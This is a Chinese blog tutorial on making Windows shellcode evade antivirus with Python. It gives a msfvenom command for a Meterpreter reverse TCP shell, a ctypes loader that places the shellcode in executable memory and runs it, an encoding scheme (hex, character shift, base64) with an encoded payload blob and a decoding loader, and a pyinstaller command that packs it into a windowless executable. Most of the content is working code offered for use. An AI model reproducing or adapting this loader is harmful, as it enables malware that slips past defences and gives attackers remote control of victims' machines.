python免杀shellcode案例

简单的病毒绕过免杀,完成加壳操作

  • kali构造payload
    msfvenom –platform windows –a x64  -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.18.184 LPORT=4444 -f py -o shellcode2.py

  • 放置python执行,注意这是64位系统
    buf = b"\x4d\x5a\x41\x52\x55\......."
    
    import ctypes
    shellcode = buf
    shellcode = bytearray(shellcode)
    # 设置VirtualAlloc返回类型为ctypes.c_uint64
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64  #注释该句则为32位
    # 申请内存
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    # 放入shellcode
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(
        ctypes.c_uint64(ptr),
        buf,
        ctypes.c_int(len(shellcode))
    )
    # 创建一个线程从shellcode放置位置首地址开始执行
    handle = ctypes.windll.kernel32.CreateThread(
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.c_uint64(ptr),
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.pointer(ctypes.c_int(0))
    )
    # 等待上面创建的线程运行完
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

  • 连接成功

 

  • 进行加密
    import binascii,base64
    resv = binascii.b2a_hex(buf)  #将十六进制转换为字符
    src = resv.decode()
    # print(res)
    def encode(src):
        re = ''
        for r in src:
            new = chr(ord(r)+5) #位移5位
            re += new
        res = base64.b64encode(re.encode()).decode()  #进行base64加密
        print(res)
    
    encode(src)

  • 进行解密并运行
    import ctypes,binascii,base64
    
    src = "a2g5PT04ajlrNWo9aGg1NTU1NTU5Njo2OTY6NTo3OT04Nmk3OjY7Ojk9PWc6Nzs1OT09Zzo3Nj06Ozk9PWc6Nzc1OWk4Nmg+OT09Zzw3OjU5PTVrZzw5ZjlmOT04Nmg1Zmg4aDs2PGg1NzdoNzU5Nmg2aD41aTk2NTZoNmo3amk6Nzk2OjY5PT1nOjc3NT1nOTc4aDk9NTZpNTs7PTY8PTY9NWc1NzVrPTo8NzU1NTU1NT1nPTU9PTU1NTU1NTk9PTpoNTw5Ozw5PTU2aTU9Zzk9Nj06NTk5PWc5NTc1OT41Nmk1ajg6Ozk9a2toPjlpODZoPjk2PWc4OT09OT01Nmk7OT04Nmg1OTZoNmg+NWlmaDk2NTZoNjg9ajU8Oms2OWg1ODloNzk1PTk6OD5pNjw6aT06PTk5PWc5NTc5OT41Nmk1Ozs5Nj1nNWg5PTk5PWc5NTZoOT41Nmk1OTY9ZzU5PT05Njo9OT01Nmk1OTY6PTpqOj46Zjk2Oj05Njo+OTY6Zjk9PThqaDc1OTY6N2trajU6PTk2Oj46Zjk9PWc2N2o+OWdra2tra2s6aTk+Z2o8PDw4ODc6azg4ODc1NTU1OTY6Ozk+PT5qOzk9PTZqaGY1NTY1NTU1OT49Pmo6OT5naDU3NTU2NjpoaDVmPTY3Zz05Njo5OT49Pmo5OWg9Pms2OTZnZjloPDw3OzU8a2tpOjloPT5qZjs9NTY1NjU1NTU6Pjk2Z2Y3Pj01O2c1NWtraTo7ZjVmOTY6ajo1OjU5aTg2aD45aTg2aDU5PWtraDU5PT0+aDc5PWtraDU5PT0+aDY5NmdmamY1a2lrajVra2k6OT09Pmg8O2Y2NTk2Oj05aD0+ajc5PT0+az45NmdmPj5mOjw5OzZra2k6PTpoNTw5NWY5PmtraGo8Omo6aj0+ODU1NTU1NTk9PThqaDY1OT09Pmo3OWk4Nmg+O2Y1OTk2Oj05PT0+az45NmdmNTdpPmg9Omtra2k6PThrPTU1PGo6Ojk9PThoOTc1Omo9Pms7O2Y5NTk2Oj47PTU1NjU1NTU1OTY6PTk9PT5rNzk9ODZoPjk2Z2Y6PWY5OjhqOmtraTo5PT0+aDg5Pj0+aDw5aTg2aD45Pj0+azU5PT0+aWY5PT0+az45NmdmNTdpPmg9Omtra2k6PThrPTU1PGk3PTo9OTY6PDo+Oz01NTk1NTU1NTk2Oj07ZjU1OmY5NmdmNWc3azVrODVra2k6Ojw6Pjk2Z2Y8OjtqOWk7NmtraTo5PmtraGpqPjhoa2tra2trOT01Nmg4OT03Pmg7OT09Oms7PDpnOTk2a2tqPDo9O2Y1NTo+OT5oPGg3azVnOmY3Ojtra2k6"
    def decode(src):
        res = base64.b64decode(src).decode()
        # print(res)
        sr = ''
        for s in res:
            new = chr(ord(s) - 5)
            sr += new
        # print(sr)
        buf = binascii.a2b_hex(sr)   #将字符转换为十六进制
        return buf
    
    buf = decode(src)
    
    # print(buf)
    
    shellcode = buf
    shellcode = bytearray(shellcode)
    # 设置VirtualAlloc返回类型为ctypes.c_uint64
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
    # 申请内存
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
    # 放入shellcode
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
    ctypes.windll.kernel32.RtlMoveMemory(
        ctypes.c_uint64(ptr),
        buf,
        ctypes.c_int(len(shellcode))
    )
    # 创建一个线程从shellcode放置位置首地址开始执行
    handle = ctypes.windll.kernel32.CreateThread(
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.c_uint64(ptr),
        ctypes.c_int(0),
        ctypes.c_int(0),
        ctypes.pointer(ctypes.c_int(0))
    )
    # 等待上面创建的线程运行完
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))

  • 使用python命令打包
    pyinstaller -F -w payload.py 

     

     

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值